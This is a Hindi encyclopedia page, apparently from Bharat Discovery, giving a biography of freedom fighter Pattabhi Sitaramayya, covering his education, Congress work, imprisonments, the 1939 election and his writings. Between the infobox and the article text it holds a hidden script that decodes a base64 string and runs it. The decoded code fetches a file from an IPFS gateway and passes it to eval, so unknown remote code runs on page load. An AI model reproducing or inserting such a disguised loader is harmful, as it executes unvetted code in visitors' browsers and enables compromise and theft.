भोगराजू पट्टाभि सीतारामैया

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
भोगराजू पट्टाभि सीतारामैया
पट्टाभि सीतारामैया
पूरा नाम भोगराजू पट्टाभि सीतारामैया
जन्म 24 दिसम्बर, 1880
जन्म भूमि नेल्लौर तालुका, आन्ध्र प्रदेश
मृत्यु 17 दिसम्बर, 1959
नागरिकता भारतीय
प्रसिद्धि स्वतंत्रता सेनानी, लेखक व पत्रकार
धर्म हिन्दू
आंदोलन 'असहयोग आन्दोलन' में भाग लिया
जेल यात्रा 1930, 1932 और 1942 में जेल की सजाएँ भोगीं
विद्यालय 'मद्रास क्रिश्चियन कॉलेज'
शिक्षा बी. ए.
विशेष योगदान देशी रियासतों में राष्ट्रीय जाग्रति लाने में आपका बड़ा योगदान था।
अन्य जानकारी सीतारामैयाजी 1948 की जयपुर कांग्रेस के अध्यक्ष चुने गए थे। वे 1952 से 1957 तक वे मध्य प्रदेश के राज्यपाल भी रहे।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

भोगराजू पट्टाभि सीतारामैया (अंग्रेज़ी: Bhogaraju Pattabhi Sitaramayya; जन्म- 24 दिसम्बर, 1880, आन्ध्र प्रदेश; मृत्यु- 17 दिसम्बर, 1959) भारत के प्रसिद्ध स्वतंत्रता सेनानी, गाँधीवादी और पत्रकार थे। इन्होंने दक्षिण भारत में स्वतंत्रता की अलख जगाने में महत्त्वपूर्ण भूमिका निभाई थी। आपने राष्ट्रीय हितों को दूसरे हितों के मुकाबले हमेशा प्राथमिकता में रखा। सीतारामैया राष्ट्रपिता महात्मा गाँधी के प्रमुख सहयोगियों में से एक थे। जब सन 1939 में कांग्रेस अध्यक्ष के निर्वाचन में पट्टाभि सीतारामैया सुभाषचन्द्र बोस से पराजित हो गए, तब महात्मा गाँधी ने उनकी हार को अपनी हार कहा था। भारत की आज़ादी के बाद वर्ष 1952 से 1957 तक वे मध्य प्रदेश राज्य के राज्यपाल रहे थे। सीतारामैया एक लेखक के तौर पर भी जाने जाते थे। उन्होंने 'भारतीय राष्ट्रीय कांग्रेस' का इतिहास भी लिखा था।

जन्म तथा शिक्षा

पट्टाभि सीतारामैया का जन्म 24 दिसम्बर, 1880 ई. को आंध्र प्रदेश के नेल्लौर तालुके में एक निर्धन परिवार में हुआ था। उनके पिता आठ रुपये प्रति महीने के वेतन पर गृहस्थी चलाते थे। जब सीतारामैया चार-पाँच वर्ष के थे, तभी इनके पिता का देहांत हो गया। अनेक कठिन परिस्थितियों के आने पर भी उन्होंने अपनी शिक्षा जारी रखी। उन्होंने अपनी बी.ए. की डिग्री 'मद्रास क्रिश्चियन कॉलेज' से प्राप्त की। काकीनाड़ा के एक धनी वकील की कन्या से उनका विवाह हुआ। इसके बाद उन्होंने मेडिकल की पढ़ाई पूरी की और मछलीपट्टम में चिकित्स के रूप में व्यवसायिक जीवन में लग गए।

कांग्रेस से सम्पर्क

राष्ट्रीयता की भावना उनके अंदर आरंभ से ही विद्यमान थी। 'बंग भंग' के विरुद्ध देशव्यापी आंदोलन का उन पर प्रभाव पड़ा था। कॉलेज के दिनों से ही वे कांग्रेस के समर्क में आ चुके थे। राष्ट्रीय विचारों के प्रचार के लिए उन्होंने 'जन्मभूमि' नामक एक साहित्यिक पत्र भी निकाला था। सन 1916 से 1952 तक वे 'अखिल भारतीय कांग्रेस कमेटी' के और अनेक बार कार्य समिति के सदस्य भी रहे।

जेल यात्रा

महात्मा गाँधी के प्रभाव से सन 1920 में 'असहयोग आन्दोलन' के समय उन्होंने चिकित्सा कार्य त्याग दिया। उसके बाद प्रत्येक आंदोलन में भाग लेने के कारण 1930, 1932 और 1942 में जेल की सजाएँ भोगीं। देशी रियासतों में राष्ट्रीय जाग्रति लाने में उनका बड़ा योगदान था। आंध्र प्रदेश में 'सहकारिता आंदोलन' और 'राष्ट्रीय बीमा कंपनियाँ' आंरभ करने का श्रेय भी सीतारामैया को जाता है।

कांग्रेस अध्यक्ष का पद

सीतारामैया 1939 में 'भारतीय राष्ट्रीय कांग्रेस' के अध्यक्ष पद के लिए खड़ा होने को लेकर अत्यंत चर्चा में रहे थे। सामान्य तौर पर कांग्रेस का अध्यक्ष सर्वसम्मति से निर्वाचित होता था। वर्ष 1938 में अध्यक्ष निर्वाचित हुए नेताजी सुभाषचंद्र बोस ने 1939 में भी कांग्रेस अध्यक्ष पद हेतु चुनाव लड़ने का निर्णय किया। नेताजी बोस ने कहा कि "कांग्रेस अध्यक्ष का चुनाव विभिन्न समस्याओं और कार्यक्रमों के आधार पर ही लड़ा जाना चाहिए"। सुभाषचन्द्र बोस जनवरी, 1939 में महात्मा गाँधी का आशीर्वाद प्राप्त सीतारामैया से 1,377 के मुकाबले 1,580 मतों से जीत गए। सीतारामैया जी की हार पर गाँधीजी ने बयान दिया कि "सीतारामैया की हार उनसे अधिक मेरी हार है"। बाद में वर्ष 1948 की जयपुर कांग्रेस के वे अध्यक्ष चुने गए थे। 1952 से 1957 तक वे मध्य प्रदेश के राज्यपाल पद पर भी रहे।

रचना कार्य

भारत की स्वतत्रंता के बाद पट्टाभि सीतारामैया ने राजनीतिक पद के लिए कोई भी चुनाव नहीं लड़ा। अब वे लेखन कार्य में लग गए। एक लेखक के रूप में उन्हें ख्याति प्राप्त थी। उनके द्वारा रचित मुख्य ग्रंथ हैं-

  1. सिक्सटी इयर्स आँफ कांग्रेस
  2. फेदर्स एण्ड-स्टोन्स
  3. नेशनल एजुकेशन
  4. इंडियन नेशनलिज्म
  5. रिडिस्ट्रिब्यूशन आँफ स्टेट्स
  6. हिस्ट्री आँफ दि कांग्रेस

उनकी अंतिम पुस्तक अपने विषय प्रामाणिक और सर्वाधिक प्रसिद्ध पुस्तक है। इसका पहला भाग सन 1935 में और दूसरा भाग 1947 में प्रकाशित हुआ था।

निधन

17 दिसम्बर, 1959 ई. को पट्टाभि सीतारामैया का देहांत हुआ।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख